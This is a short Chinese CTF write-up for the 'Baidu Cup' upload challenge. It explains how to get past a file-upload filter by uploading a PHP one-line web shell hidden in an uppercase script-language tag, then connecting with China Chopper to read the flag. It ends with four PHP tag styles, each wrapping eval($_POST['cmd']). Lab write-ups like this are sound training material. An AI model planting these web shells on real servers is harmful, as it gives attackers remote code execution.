“百度杯”九月 upload

首先,打开是一个上传界面

,说是可以随意上传,那就传一个一句话木马,,上传之后点击上传成功后看到这样一个界面

会发现php,<?没了,猜测被过滤,所以我们换一种php风格,然后php对于大小写敏感,可以将php大写然后上传

1 <script language="PHP">
2    @eval($_POST['value'])
3 </script>
View Code

 

然后进行菜刀链接,往上一个目录将会发现flag.php,就行了

 

附php的四种风格:

1.

<?php
eval($_POST['cmd']); 
 ?>

2.

<script language="php">
    eval($_POST['cmd']);
</script>

3.

<? 
    eval($_POST['cmd']);
?>

4.

<% 
    eval($_POST['cmd']);
%>

 

 

参考:PHP四种标记风格  楼兰0x23 https://blog.csdn.net/qq_35085863/article/details/76714367

 

posted @ 2020-06-30 20:25  starshine0618  阅读(203)  评论(0)    收藏  举报